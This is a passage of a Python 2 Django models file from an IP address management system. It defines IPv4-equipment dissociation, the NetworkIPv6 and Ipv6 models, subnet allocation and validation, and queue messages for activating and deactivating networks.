If Ip from this Ip-Equipment is associated with created Vip Request, and the Equipment
is the last balancer associated, the IpEquipment association cannot be removed.
If Ip has no relationship with other Equipments, then Ip is also removed.
"""
for r in self.ip.requisicaovips_set.all():
if self.equipamento.tipo_equipamento == TipoEquipamento.get_tipo_balanceador():
# Get all equipments (except the one being removed) related to ip
# to find another balancer
other_equips = self.ip.ipequipamento_set.exclude(
equipamento=self.equipamento.id)
another_balancer = False
for ipequip in other_equips:
if ipequip.equipamento.tipo_equipamento == TipoEquipamento.get_tipo_balanceador():
another_balancer = True
break
if not another_balancer:
if r.vip_criado:
raise IpEquipCantDissociateFromVip({'vip_id': r.id, 'ip': mount_ipv4_string(
self.ip), 'equip_name': self.equipamento.nome}, 'Ipv4 não pode ser disassociado do equipamento %s porque é o último balanceador da Requisição Vip %s.' % (self.equipamento.nome, r.id))
else:
# Remove ip from vip or remove vip
id_vip = r.id
if r.ipv6 is not None:
r.ip = None
r.validado = 0
r.save()
# SYNC_VIP
syncs.old_to_new(r)
else:
r.delete()
# SYNC_VIP
syncs.delete_new(id_vip)
if self.ip.serverpoolmember_set.count() > 0:
server_pool_identifiers = set()
for svm in self.ip.serverpoolmember_set.all():
item = '{}:{}'.format(svm.server_pool.id,
svm.server_pool.identifier)
server_pool_identifiers.add(item)
server_pool_identifiers = list(server_pool_identifiers)
server_pool_identifiers = ', '.join(
str(server_pool) for server_pool in server_pool_identifiers)
raise IpCantRemoveFromServerPool({'ip': mount_ipv4_string(self.ip), 'equip_name': self.equipamento.nome, 'server_pool_identifiers': server_pool_identifiers},
'Ipv4 não pode ser disassociado do equipamento %s porque ele está sendo utilizando nos Server Pools (id:identifier) %s' % (self.equipamento.nome, server_pool_identifiers))
super(IpEquipamento, self).delete()
# If IP is not related to any other equipments, its removed
if self.ip.ipequipamento_set.count() == 0:
self.ip.delete()
def delete_v3(self):
"""
Method V3 to remove Ip and Equipment relationship.
If Ip from this Ip-Equipment is associated with created Vip Request,
and the Equipment is the last balancer associated, the IpEquipment
association cannot be removed.
If Ip has no relationship with other Equipments, then Ip is also removed.
@raise IpCantRemoveFromServerPool: Ip is associated with associated
Pool Member.
@raise IpEquipCantDissociateFromVip: Equipment is the last balanced
in a created Vip Request
pointing to ip.
"""
type_eqpt = TipoEquipamento.get_tipo_balanceador()
if self.equipamento.tipo_equipamento == type_eqpt:
for vip in self.ip.viprequest_set.all():
# Filter equipments to find another balancer
another_balancer = self.ip.ipequipamento_set.exclude(
equipamento=self.equipamento.id
).filter(equipamento__tipo_equipamento=type_eqpt)
id_vip = vip.id
if not another_balancer:
with distributedlock(LOCK_VIP % id_vip):
if vip.created:
raise IpEquipCantDissociateFromVip(
{
'vip_id': id_vip,
'ip': self.ip.ip_formated,
'equip_name': self.equipamento.nome
},
'IPv4 can not be dissociated from the '
'equipment %s because it is the last '
'balancer of Vip Request %s.'
% (self.equipamento.nome, id_vip)
)
else:
# Remove ip from vip
if vip.ipv6 is not None:
vip.ipv4 = None
id_vip.save()
# SYNC_VIP
syncs.new_to_old(vip)
# Remove vip
else:
vip.delete_v3(bypass_ipv4=True,
bypass_ipv6=True)
if self.ip.serverpoolmember_set.count() > 0:
items = ['{}:{}'.format(
svm.server_pool.id,
svm.server_pool.identifier
) for svm in self.ip.serverpoolmember_set.all()]
items = ', '.join(items)
raise IpCantRemoveFromServerPool(
{
'ip': self.ip.ip_formated,
'equip_name': self.equipamento.nome,
'server_pool_identifiers': items
},
'IPv4 can not be dissociated from the equipment% s because it'
'is being using in the Server Pools (id: identifier)%s' %
(self.equipamento.nome, items)
)
super(IpEquipamento, self).delete()
# If IP is not related to any other equipments, its removed
if self.ip.ipequipamento_set.count() == 0:
self.ip.delete_v3()
def create_v3(self, ip_equipment):
"""Inserts a relationship between IP e Equipment.
@return: Nothing.
@raise IpError: Failure to insert.
@raise EquipamentoNotFoundError: Equipment do not registered.
@raise IpNotFoundError: Ip do not registered.
@raise IpEquipamentoDuplicatedError: IP already registered for the equipment.
@raise EquipamentoError: Failure to search equipment.
"""
self.equipamento = Equipamento().get_by_pk(ip_equipment.get('equipment'))
self.ip = Ip().get_by_pk(ip_equipment.get('ip'))
# Validate the ip
self.__validate_ip()
try:
# All equipments related with environment of IP
eqpts = self.ip.networkipv4.vlan.ambiente\
.equipamentoambiente_set.all()\
.values_list('equipamento', flat=True)
if ip_equipment.get('equipment') not in eqpts:
ea = EquipamentoAmbiente(
ambiente=self.ip.networkipv4.vlan.ambiente,
equipamento=self.equipamento
)
ea.save()
self.save()
except Exception, e:
self.log.error(u'Failure to insert an ip_equipamento.')
raise IpError(e, u'Failure to insert an ip_equipamento.')
def remove(self, authenticated_user, ip_id, equip_id):
"""Search and remove relationship between IP and equipment.
@return: Nothing
@raise IpEquipmentNotFoundError: There's no relationship between Ip and Equipment.
@raise IpCantBeRemovedFromVip: Ip is associated with created Vip Request.
@raise IpEquipCantDissociateFromVip: Equipment is the last balanced in a created Vip Request pointing to ip.
@raise IpError: Failed to remove the relationship.
"""
ip_equipamento = self.get_by_ip_equipment(ip_id, equip_id)
try:
ip_equipamento.delete()
except (IpCantBeRemovedFromVip, IpEquipCantDissociateFromVip), e:
raise e
except Exception, e:
self.log.error(u'Falha ao remover um ip_equipamento.')
raise IpError(e, u'Falha ao remover um ip_equipamento.')
class NetworkIPv6(BaseModel):
id = models.AutoField(
primary_key=True
)
vlan = models.ForeignKey(
'vlan.Vlan',
db_column='id_vlan'
)
network_type = models.ForeignKey(
'vlan.TipoRede',
null=True,
db_column='id_tipo_rede'
)
ambient_vip = models.ForeignKey(
'ambiente.EnvironmentVip',
null=True,
db_column='id_ambientevip'
)
block = models.IntegerField(
db_column='bloco'
)
block1 = models.CharField(
max_length=4,
db_column='bloco1'
)
block2 = models.CharField(
max_length=4,
db_column='bloco2'
)
block3 = models.CharField(
max_length=4,
db_column='bloco3'
)
block4 = models.CharField(
max_length=4,
db_column='bloco4'
)
block5 = models.CharField(
max_length=4,
db_column='bloco5'
)
block6 = models.CharField(
max_length=4,
db_column='bloco6'
)
block7 = models.CharField(
max_length=4,
db_column='bloco7'
)
block8 = models.CharField(
max_length=4,
db_column='bloco8'
)
mask1 = models.CharField(
max_length=4,
db_column='mask_bloco1'
)
mask2 = models.CharField(
max_length=4,
db_column='mask_bloco2'
)
mask3 = models.CharField(
max_length=4,
db_column='mask_bloco3'
)
mask4 = models.CharField(
max_length=4,
db_column='mask_bloco4'
)
mask5 = models.CharField(
max_length=4,
db_column='mask_bloco5'
)
mask6 = models.CharField(
max_length=4,
db_column='mask_bloco6'
)
mask7 = models.CharField(
max_length=4,
db_column='mask_bloco7'
)
mask8 = models.CharField(
max_length=4,
db_column='mask_bloco8'
)
cluster_unit = models.CharField(
max_length=45,
db_column='cluster_unit'
)
active = models.BooleanField()
log = logging.getLogger('NetworkIPv6')
class Meta(BaseModel.Meta):
db_table = u'redeipv6'
managed = True
def _get_formated_ip(self):
"""Returns formated ip."""
return '%s:%s:%s:%s:%s:%s:%s:%s/%s' % (self.block1, self.block2, self.block3,
self.block4, self.block5, self.block6,
self.block7, self.block8, self.block)
networkv6 = property(_get_formated_ip)
def _get_formated_mask(self):
"""Returns formated mask."""
return '%s:%s:%s:%s:%s:%s:%s:%s' % (self.mask1, self.mask2, self.mask3, self.mask4,
self.mask5, self.mask6, self.mask7, self.mask8)
mask_formated = property(_get_formated_mask)
def _get_formated_octs(self):
"""Returns formated octs."""
return '%s:%s:%s:%s:%s:%s:%s:%s' % (
self.block1, self.block2, self.block3, self.block4,
self.block5, self.block6, self.block7, self.block8)
formated_octs = property(_get_formated_octs)
@cached_property
def dhcprelay(self):
dhcprelay = self.dhcprelayipv6_set.all()
return dhcprelay
@classmethod
def get_by_pk(cls, id):
"""Get NetworkIPv6 by id.
@return: NetworkIPv6.
@raise NetworkIPv6NotFoundError: NetworkIPv6 is not registered.
@raise NetworkIPv6Error: Failed to search for the NetworkIPv6.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return NetworkIPv6.objects.filter(id=id).uniqueResult()
except ObjectDoesNotExist, e:
raise NetworkIPv6NotFoundError(
e, u'Can not find a NetworkIPv6 with id = %s.' % id)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Error finding NetworkIPv6.')
raise NetworkIPv6Error(e, u'Error finding NetworkIPv6.')
def activate(self, authenticated_user):
try:
self.active = 1
self.save()
net_slz = get_app('api_network', 'serializers.v3')
serializer = net_slz.NetworkIPv6V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv6_ACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv6_ACTIVATE,
'kind': queue_keys.NETWORKv6_KEY,
'data': data_to_queue
})
queue_manager.send()
except Exception, e:
self.log.error(u'Error activating NetworkIPv6.')
raise NetworkIPv4Error(e, u'Error activating NetworkIPv6.')
def deactivate(self, authenticated_user, commit=False):
"""
Update status column to 'active = 0'
@param authenticated_user: User authenticate
@raise NetworkIPv6Error: Error disabling NetworkIPv6.
"""
try:
self.active = 0
self.save(authenticated_user, commit=commit)
net_slz = get_app('api_network', 'serializers.v3')
serializer = net_slz.NetworkIPv6V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv6_DEACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv6_DEACTIVATE,
'kind': queue_keys.NETWORKv6_KEY,
'data': data_to_queue
})
queue_manager.send()
except Exception, e:
self.log.error(u'Error disabling NetworkIPv6.')
raise NetworkIPv6Error(e, u'Error disabling NetworkIPv6.')
def edit_network_ipv6(self, authenticated_user, id_net_type, id_env_vip, cluster_unit):
try:
self.network_type = id_net_type
self.ambient_vip = id_env_vip
self.cluster_unit = cluster_unit
self.save()
except Exception, e:
self.log.error(u'Error on update NetworkIPv6.')
raise NetworkIPv4Error(e, u'Error on update NetworkIPv6.')
def add_network_ipv6(self, user, id_vlan, network_type, evip, prefix=None):
"""
Insert new NetworkIPv6 in database
@return: Vlan map
@raise VlanNotFoundError: Vlan is not registered.
@raise VlanError: Failed to search for the Vlan
@raise ConfigEnvironmentInvalidError: Invalid Environment Configuration or not registered
@raise NetworkIPv6Error: Error persisting a NetworkIPv6.
@raise NetworkIPv6AddressNotAvailableError: Unavailable address to create a NetworkIPv6.
@raise InvalidValueError: Network type does not exist.
"""
self.vlan = Vlan().get_by_pk(id_vlan)
network_found = None
stop = False
internal_network_type = None
type_ipv6 = IP_VERSION.IPv6[0]
try:
# Find all configs type v6 in environment
configs = ConfigEnvironment.get_by_environment(
self.vlan.ambiente.id).filter(ip_config__type=IP_VERSION.IPv6[0])
# If not found, an exception is thrown
if len(configs) == 0:
raise ConfigEnvironmentInvalidError(
None, u'Invalid Configuration')
# Find all networks ralated to environment
nets = NetworkIPv6.objects.filter(
vlan__ambiente__id=self.vlan.ambiente.id)
# Cast to API class
networksv6 = set([(IPv6Network(
'%s:%s:%s:%s:%s:%s:%s:%s/%s' %
(net_ip.block1, net_ip.block2, net_ip.block3,
net_ip.block4, net_ip.block5, net_ip.block6,
net_ip.block7, net_ip.block8, net_ip.block))) for net_ip in nets])
# For each configuration founded in environment
for config in configs:
# If already get a network stop this
if stop:
break
# Need to be IPv6
if config.ip_config.type == IP_VERSION.IPv6[0]:
net6 = IPv6Network(config.ip_config.subnet)
if prefix is not None:
new_prefix = int(prefix)
else:
new_prefix = int(config.ip_config.new_prefix)
self.log.info(u'Prefix that will be used: %s' % new_prefix)
# For each subnet generated with configs
for subnet in net6.iter_subnets(new_prefix=new_prefix):
# Checks if the network generated is UNUSED
if subnet not in networksv6:
in_range = network_in_range(
self.vlan, subnet, type_ipv6)
if not in_range:
continue
# If not this will be USED
network_found = subnet
if network_type:
internal_network_type = network_type
elif config.ip_config.network_type is not None:
internal_network_type = config.ip_config.network_type
else:
self.log.error(
u'Parameter tipo_rede is invalid. Value: %s', network_type)
raise InvalidValueError(
None, 'network_type', network_type)
# Stop generation logic
stop = True
break
# If not be IPv6
else:
# Throw an exception
raise ConfigEnvironmentInvalidError(
None, u'Invalid Configuration')
except (ValueError, TypeError, AddressValueError), e:
raise ConfigEnvironmentInvalidError(e, u'Invalid Configuration')
# Checks if found any available network
if network_found is None:
# If not found, an exception is thrown
raise NetworkIPv6AddressNotAvailableError(
None, u'Unavailable address to create a NetworkIPv6.')
# Set block by network generated
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8 = str(
network_found.network.exploded).split(':')
# Set block by network generated
self.block = network_found.prefixlen
# Set mask by network generated
self.mask1, self.mask2, self.mask3, self.mask4, self.mask5, self.mask6, self.mask7, self.mask8 = str(
network_found.netmask.exploded).split(':')
try:
# Set Network Type
self.network_type = internal_network_type
# Set Environment VIP
self.ambient_vip = evip
self.save()
except Exception, e:
self.log.error(u'Error persisting a NetworkIPv6.')
raise NetworkIPv6Error(e, u'Error persisting a NetworkIPv6.')
# Return vlan map
vlan_map = dict()
vlan_map['id'] = self.vlan.id
vlan_map['nome'] = self.vlan.nome
vlan_map['num_vlan'] = self.vlan.num_vlan
vlan_map['id_tipo_rede'] = self.network_type.id
vlan_map['id_ambiente'] = self.vlan.ambiente.id
vlan_map['bloco1'] = self.block1
vlan_map['bloco2'] = self.block2
vlan_map['bloco3'] = self.block3
vlan_map['bloco4'] = self.block4
vlan_map['bloco5'] = self.block5
vlan_map['bloco6'] = self.block6
vlan_map['bloco7'] = self.block7
vlan_map['bloco8'] = self.block8
vlan_map['bloco'] = self.block
vlan_map['mask_bloco1'] = self.mask1
vlan_map['mask_bloco2'] = self.mask2
vlan_map['mask_bloco3'] = self.mask3
vlan_map['mask_bloco4'] = self.mask4
vlan_map['mask_bloco5'] = self.mask5
vlan_map['mask_bloco6'] = self.mask6
vlan_map['mask_bloco7'] = self.mask7
vlan_map['mask_bloco8'] = self.mask8
vlan_map['descricao'] = self.vlan.descricao
vlan_map['acl_file_name'] = self.vlan.acl_file_name
vlan_map['acl_valida'] = self.vlan.acl_valida
vlan_map['acl_file_name_v6'] = self.vlan.acl_file_name_v6
vlan_map['acl_valida_v6'] = self.vlan.acl_valida_v6
vlan_map['ativada'] = self.vlan.ativada
vlan_map['id_network'] = self.id
map = dict()
map['vlan'] = vlan_map
return map
def delete(self):
try:
for ip in self.ipv6_set.all():
ip.delete()
super(NetworkIPv6, self).delete()
except IpCantBeRemovedFromVip, e:
# Network id and ReqVip id
net_name = str(self.block1) + ':' + str(self.block2) + \
':' + str(self.block3) + ':' + str(self.block4) + ':'
net_name = net_name + str(self.block5) + ':' + str(self.block6) + ':' + str(
self.block7) + ':' + str(self.block8) + '/' + str(self.block)
cause = {'Net': net_name, 'ReqVip': e.cause}
raise IpCantBeRemovedFromVip(
cause, 'Esta Rede possui um Vip apontando para ela, e não pode ser excluída')
def create_v3(self, networkv6):
"""
Create new networkIPv6.
"""
self.block1 = networkv6.get('block1')
self.block2 = networkv6.get('block2')
self.block3 = networkv6.get('block3')
self.block4 = networkv6.get('block4')
self.block5 = networkv6.get('block5')
self.block6 = networkv6.get('block6')
self.block7 = networkv6.get('block7')
self.block8 = networkv6.get('block8')
self.block = networkv6.get('prefix')
self.mask1 = networkv6.get('mask1')
self.mask2 = networkv6.get('mask2')
self.mask3 = networkv6.get('mask3')
self.mask4 = networkv6.get('mask4')
self.mask5 = networkv6.get('mask5')
self.mask6 = networkv6.get('mask6')
self.mask7 = networkv6.get('mask7')
self.mask8 = networkv6.get('mask8')
self.cluster_unit = networkv6.get('cluster_unit')
validate_network = True
if not self.block1 and not self.block2 and not self.block3 and \
not self.block4 and not self.block5 and not self.block6 and \
not self.block7 and not self.block8:
self.allocate_network(networkv6.get(
'vlan'), networkv6.get('prefix'))
validate_network = False
if self.block and self.block1 and self.block2 and self.block3 and \
self.block4 and self.block5 and self.block6 and \
self.block7 and self.block8:
ip = IPNetwork('%s/%s' % (self.formated_octs, self.block))
mask = ip.netmask.exploded.split(':')
self.mask1 = mask[0]
self.mask2 = mask[1]
self.mask3 = mask[2]
self.mask4 = mask[3]
self.mask5 = mask[4]
self.mask6 = mask[5]
self.mask7 = mask[6]
self.mask8 = mask[7]
elif self.mask1 and self.mask2 and self.mask3 and self.mask4 and \
self.mask5 and self.mask6 and self.mask7 and self.mask8:
ip = IPNetwork('%s/%s' % (self.formated_octs, self.mask_formated))
self.block = ip.prefixlen
else:
raise Exception('Is need to send block ou mask.')
vlan_model = get_model('vlan', 'Vlan')
self.vlan = vlan_model().get_by_pk(networkv6.get('vlan'))
tiporede_model = get_model('vlan', 'TipoRede')
self.network_type = tiporede_model().get_by_pk(networkv6.get('network_type'))
# has environmentvip
if networkv6.get('environmentvip'):
environmentvip_model = get_model('ambiente', 'EnvironmentVip')
self.environmentvip = environmentvip_model().get_by_pk(
networkv6.get('environmentvip'))
self.validate_v3()
if validate_network:
self.validate_network()
self.save()
def update_v3(self, networkv6):
"""
Update new networkIPv6.
"""
self.cluster_unit = networkv6.get('cluster_unit')
tiporede_model = get_model('vlan', 'TipoRede')
self.network_type = tiporede_model().get_by_pk(networkv6.get('network_type'))
# has environmentvip
if networkv6.get('environmentvip'):
environmentvip_model = get_model('ambiente', 'EnvironmentVip')
self.environmentvip = environmentvip_model().get_by_pk(
networkv6.get('environmentvip'))
self.validate_v3()
self.save()
def delete_v3(self):
"""
Method V3 to remove networkIPv6.
Before removing the networkIPv6 removes all your Ipv4
@raise IpCantBeRemovedFromVip: Ip is associated with created
Vip Request.
"""
try:
for ip in self.ipv6_set.all():
ip.delete_v3()
super(NetworkIPv6, self).delete()
except IpCantBeRemovedFromVip, e:
# Network id and Vip Request id
raise Exception(
'This network has a VIP pointing to it, and can not be deleted. '
'Network:%s, Vip Request: %s' % (self.mask_formated, e.cause))
def validate_v3(self):
"""
Validate NetworkIPv6.
"""
# validate if network if allow in environment
configs = self.vlan.ambiente.configs.all()
self.vlan.allow_networks_environment(configs, [], [self])
def validate_network(self):
envs = self.vlan.get_environment_related()
net_ip = [IPNetwork(self.networkv6)]
nets_envs = list()
# for env in envs:
# # get configs v4 of environment
# nts = [IPNetwork(config.ip_config.subnet)
# for config in env.configs.filter(
# ip_config__type=IP_VERSION.IPv6[0])]
#
# if self.vlan.verify_intersect(nts, net_ip)[0]:
#
# self.log.info('Environment %s has config(%s) permiting insert '
# 'this network %s' % (env.name, nts, net_ip))
#
# # get networks that can be intersect with current network
# nets_envs += reduce(
# list.__add__,
# [list(vlan.networks_ipv6)
# for vlan in env.vlans
# if vlan.networks_ipv6],
# []
# )
#
# if nets_envs:
# nets_dict = self.vlan.prepare_networks([], [self])
# nets_env = self.vlan.prepare_networks([], nets_envs)
#
# interset = self.vlan.verify_networks(
# nets_dict[1], nets_env[1])
#
# if interset[0]:
# raise Exception(
# 'One of the equipment associated with the environment '
# 'of this Vlan is also associated with other environment '
# 'that has a network with the same track, add filters in '
# 'environments if necessary. Intersect: %s' % interset[0])
for env in envs:
# get configs v4 of environment
nts = [IPNetwork(config.ip_config.subnet)
for config in env.configs.filter(
ip_config__type=IP_VERSION.IPv6[0])]
# get networks that can be intersect with current network
if self.vlan.verify_intersect(nts, net_ip)[0]:
self.log.info('Environment %s has config(%s) permiting to insert '
'in this network %s' % (env.name, nts, net_ip))
for vlan in env.vlans:
for network_ipv6 in vlan.networks_ipv6:
nets_envs.append(IPNetwork(network_ipv6.networkv6))
if nets_envs:
subnet, supernet = self.vlan.verify_intersect(nets_envs, net_ip)
if subnet or supernet:
raise Exception(
'One of the equipment associated with the environment '
'of this Vlan is also associated with other environment '
'that has a network with the same track, add filters in '
'environments if necessary. Your Network: %s, Network'
'already created: %s' % (subnet, supernet))
subnet, supernet = self.vlan.verify_intersect(net_ip, nets_envs)
if subnet or supernet:
raise Exception(
'One of the equipment associated with the environment '
'of this Vlan is also associated with other environment '
'that has a network with the same track, add filters in '
'environments if necessary. Your Network: %s, Network'
'already created: %s' % (supernet, subnet))
def activate_v3(self):
"""
Send activate info of network v6 for queue of ACL configuration
system.
Update status column to 'active = 1'.
@raise NetworkIPv6Error: Error activating a NetworkIPv6.
"""
try:
self.active = 1
self.save()
net_slz = get_app('api_network', 'serializers.v3')
serializer = net_slz.NetworkIPv6V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv6_ACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv6_ACTIVATE,
'kind': queue_keys.NETWORKv6_KEY,
'data': data_to_queue
})
queue_manager.send()
except Exception, e:
self.log.error(u'Error activating NetworkIPv6.')
raise NetworkIPv4Error(e, u'Error activating NetworkIPv6.')
def deactivate_v3(self):
"""
Send deactivate info of network v6 for queue of ACL configuration
system.
Update status column to 'active = 0'.
@raise NetworkIPv6Error: Error disabling a NetworkIPv6.
"""
try:
net_slz = get_app('api_network', 'serializers.v3')
self.active = 0
serializer = net_slz.NetworkIPv6V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv6_DEACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv6_DEACTIVATE,
'kind': queue_keys.NETWORKv6_KEY,
'data': data_to_queue
})
queue_manager.send()
self.save()
except Exception, e:
self.log.error(u'Error disabling NetworkIPv6.')
raise NetworkIPv4Error(e, u'Error disabling NetworkIPv6.')
def allocate_network(self, id_vlan, prefix=None):
"""Allocate new NetworkIPv6
@raise VlanNotFoundError: Vlan is not registered.
@raise VlanError: Failed to search for the Vlan
@raise ConfigEnvironmentInvalidError: Invalid Environment Configuration or not registered
@raise NetworkIPv4Error: Error persisting a NetworkIPv4.
@raise NetworkIPv4AddressNotAvailableError: Unavailable address to create a NetworkIPv4.
@raise Invalid: Unavailable address to create a NetworkIPv4.
@raise InvalidValueError: Network type does not exist.
"""
vlan_model = get_model('vlan', 'Vlan')
self.vlan = vlan_model().get_by_pk(id_vlan)
netv4, nets_envs = self.vlan.get_networks_related(
has_netv4=False, exclude_current=False)
nets_envs = [IPNetwork(net.networkv6) for net in nets_envs]
network_found = None
try:
configs = self.vlan.ambiente.configs.filter(
ip_config__type=IP_VERSION.IPv6[0])
# For each configuration founded in environment
for config in configs:
net6 = IPNetwork(config.ip_config.subnet)
if prefix is not None:
new_prefix = int(prefix)
else:
new_prefix = int(config.ip_config.new_prefix)
self.log.info(
u'Prefix that will be used: %s' % new_prefix)
subnets = net6.iter_subnets(new_prefix=new_prefix)
for subnet in subnets:
try:
self.vlan.verify_networks(nets_envs, [subnet])
except Exception, e:
pass
continue
else:
# Set octs by network generated
self.block1, self.block2, self.block3, self.block4,\
self.block5, self.block6, self.block7, self.block8 = str(
subnet.network.exploded
).split(':')
# Set block by network generated
self.block = subnet.prefixlen
mask = subnet.netmask.exploded.split(':')
self.mask1 = mask[0]
self.mask2 = mask[1]
self.mask3 = mask[2]
self.mask4 = mask[3]
self.mask5 = mask[4]
self.mask6 = mask[5]
self.mask7 = mask[6]
self.mask8 = mask[7]
return
# Checks if found any available network
if network_found is None:
# If not found, an exception is thrown
raise NetworkIPv6AddressNotAvailableError(
None, u'Unavailable address to create a NetworkIPv6.')
except (ValueError, TypeError, AddressValueError), e:
raise ConfigEnvironmentInvalidError(e, u'Invalid Configuration')
class Ipv6(BaseModel):
id = models.AutoField(
primary_key=True,
db_column='id_ipv6'
)
description = models.CharField(
max_length=100,
blank=True,
db_column='descricao'
)
networkipv6 = models.ForeignKey(
'ip.NetworkIPv6',
db_column='id_redeipv6'
)
block1 = models.CharField(
max_length=4,
db_column='bloco1'
)
block2 = models.CharField(
max_length=4,
db_column='bloco2'
)
block3 = models.CharField(
max_length=4,
db_column='bloco3'
)
block4 = models.CharField(
max_length=4,
db_column='bloco4'
)
block5 = models.CharField(
max_length=4,
db_column='bloco5'
)
block6 = models.CharField(
max_length=4,
db_column='bloco6'
)
block7 = models.CharField(
max_length=4,
db_column='bloco7'
)
block8 = models.CharField(
max_length=4,
db_column='bloco8'
)
log = logging.getLogger('Ipv6')
class Meta(BaseModel.Meta):
db_table = u'ipsv6'
managed = True
unique_together = ('block1', 'block2', 'block3', 'block4',
'block5', 'block6', 'block7', 'block8', 'networkipv6')
def _get_formated_ip(self):
"""Returns formated ip."""
return '%s:%s:%s:%s:%s:%s:%s:%s' % (
self.block1, self.block2, self.block3, self.block4,
self.block5, self.block6, self.block7, self.block8)
ip_formated = property(_get_formated_ip)
def _get_equipments(self):
"""Returns equipments list."""
ipeqs = self.ipv6equipament_set.all().select_related('equipamento')
eqpts = [ipeq.equipamento for ipeq in ipeqs]
return eqpts
equipments = property(_get_equipments)
def _get_vips(self):
"""Returns vips list."""
vips = self.viprequest_set.all()
return vips
vips = property(_get_vips)
def _get_server_pool_members(self):
"""Returns pool members list."""
server_pool_members = self.serverpoolmember_set.all()
return server_pool_members
server_pool_members = property(_get_server_pool_members)
@classmethod
def get_by_pk(cls, id):
"""Get IPv6 by id.
@return: IPv6.
@raise IpNotFoundError: IPv6 is not registered.
@raise IpError: Failed to search for the IPv6.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ipv6.objects.filter(id=id).uniqueResult()
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'Dont there is a IP by pk = %s.' % id)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
def get_by_blocks_equipment(self, block1, block2, block3, block4, block5, block6, block7, block8, equip_id):
"""Get IPv6 by blocks and equip_id.
@return: IPv6.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return Ipv6.objects.get(block1=block1, block2=block2, block3=block3, block4=block4, block5=block5,
block6=block6, block7=block7, block8=block8, ipv6equipament__equipamento__id=equip_id)
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'There is no IP %s:%s:%s:%s:%s:%s:%s:%s of the equipament %s.' % (
block1, block2, block3, block4, block5, block6, block7, block8, equip_id))
except Exception, e:
self.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
@classmethod
def list_by_network(cls, id_network):
"""Get IP6 LIST by id_network.
@return: IP6 List.
@raise IpNotFoundError: IP6 is not registered.
@raise IpError: Failed to search for the IP6.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ipv6.objects.filter(networkipv6=id_network)
except ObjectDoesNotExist, e:
raise IpNotFoundError(
e, u'Dont there is a IP by network_id = %s.' % id)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP')
@classmethod
def list_by_environment_and_equipment(cls, id_ambiente, id_equipment):
"""Get IP LIST by id_network.
@return: IP List.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ipv6.objects.filter(
networkipv6__vlan__ambiente__id=id_ambiente,
ipv6equipament__equipamento__id=id_equipment)
except ObjectDoesNotExist, e:
raise IpNotFoundError(
e, u'Dont there is a IP by network_id = %s.' % id)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP')
@classmethod
def get_available_ip6(cls, id_network):
"""Get a available ip6 for network6
@return: Available IP6
@raise IpNotAvailableError: NetworkIPv6 does not has available Ip6
"""
cls.networkipv6 = NetworkIPv6.get_by_pk(id_network)
# Cast to API
net6 = IPv6Network('%s:%s:%s:%s:%s:%s:%s:%s/%s' % (
cls.networkipv6.block1, cls.networkipv6.block2, cls.networkipv6.block3,
cls.networkipv6.block4, cls.networkipv6.block5, cls.networkipv6.block6,
cls.networkipv6.block7, cls.networkipv6.block8, cls.networkipv6.block))
# Find all ipv6s ralated to network
ips = Ipv6.objects.filter(networkipv6__id=cls.networkipv6.id)
# Cast all to API class
ipsv6 = set([(IPv6Address('%s:%s:%s:%s:%s:%s:%s:%s' % (
ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8))) for ip in ips])
# Get configuration
conf = Configuration.get()
selected_ip = None
# For each ip generated
# For each ip generated
i = 0
for ip in net6.iterhosts():
# Do not use some range of IPs (config)
i = i + 1
if i >= conf.IPv6_MIN and i < (net6.numhosts - conf.IPv6_MAX):
# If IP generated was not used
if ip not in ipsv6:
# Use it
selected_ip = ip
return selected_ip.exploded
# Stop generation
break
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IP6 available to NETWORK %s.' % cls.networkipv6.id)
@classmethod
def get_first_available_ip6(cls, id_network, topdown=False):
"""Get a first available ip6 for network6
@return: Available IP6
@raise IpNotAvailableError: NetworkIPv6 does not has available Ip6
"""
cls.networkipv6 = NetworkIPv6.get_by_pk(id_network)
# Cast to API
net6 = IPv6Network('%s:%s:%s:%s:%s:%s:%s:%s/%s' % (
cls.networkipv6.block1, cls.networkipv6.block2, cls.networkipv6.block3,
cls.networkipv6.block4, cls.networkipv6.block5, cls.networkipv6.block6,
cls.networkipv6.block7, cls.networkipv6.block8, cls.networkipv6.block))
